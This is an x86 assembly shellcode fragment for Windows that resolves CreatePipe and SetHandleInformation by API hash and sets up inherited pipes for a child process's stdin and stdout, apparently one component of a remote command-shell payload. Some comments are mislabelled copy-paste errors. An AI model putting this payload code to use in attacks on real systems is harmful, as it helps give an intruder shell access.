;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]

; Input: EBP is api_call
; Output:
;       esp+00	child stdin  read  file descriptor (inherited)
;       esp+04	child stdin  write file descriptor (not inherited)
;       esp+08	child stdout read  file descriptor (not inherited)
;       esp+12	child stdout write file descriptor (inherited)
;       esp+16	lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes

  push 1		 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
  push 0
  push 0x0C

create_pipe_stdout:
  push 0		 ; allocate space on stack for child stdout file descriptor
  mov ebx, esp		 ; save location of where the child stdout Write file descriptor will be
  push 0		 ; allocate space on stack for child stdout file descriptor
  mov ecx, esp		 ; save location of where the child stdout Read file descriptor will be

  push 0                 ; nSize
  lea edi,[esp+12]	 ; lpPipeAttributes - inherited
  push edi
  push ebx               ; stdout write file descriptor
  push ecx               ; stdout read file descriptor
  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
  call ebp               ; CreatePipe( Read, Write, 0, 0 )

create_pipe_stdin:
  push 0		; allocate space on stack for child stdout file descriptor
  mov ebx, esp		; save location of where the child stdout Write file descriptor will be
  push 0		; allocate space on stack for child stdout file descriptor
  mov ecx, esp		; save location of where the child stdout Read file descriptor will be

  push 0                 ; nSize
  lea edi,[esp+20]	 ; lpPipeAttributes - inherited
  push edi
  push ebx               ; stdout write file descriptor
  push ecx               ; stdout read file descriptor
  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
  call ebp               ; CreatePipe( Read, Write, 0, 0 )

no_inherit_read_handle:	 ; ensure read and write handles to child proc pipes for are not inherited
  mov ebx,[esp+8] 
  push 0
  push 1
  push ebx		 ; hChildStdoutRd is the address we set in the CreatePipe call
  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
  call ebp		 ; SetHandleInformation

no_inherit_write_handle:
  mov ebx,[esp+4]
  push 0
  push 1
  push ebx		 ; hChildStdinRw is the address we set in the CreatePipe call
  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
  call ebp	 	 ; SetHandleInformation

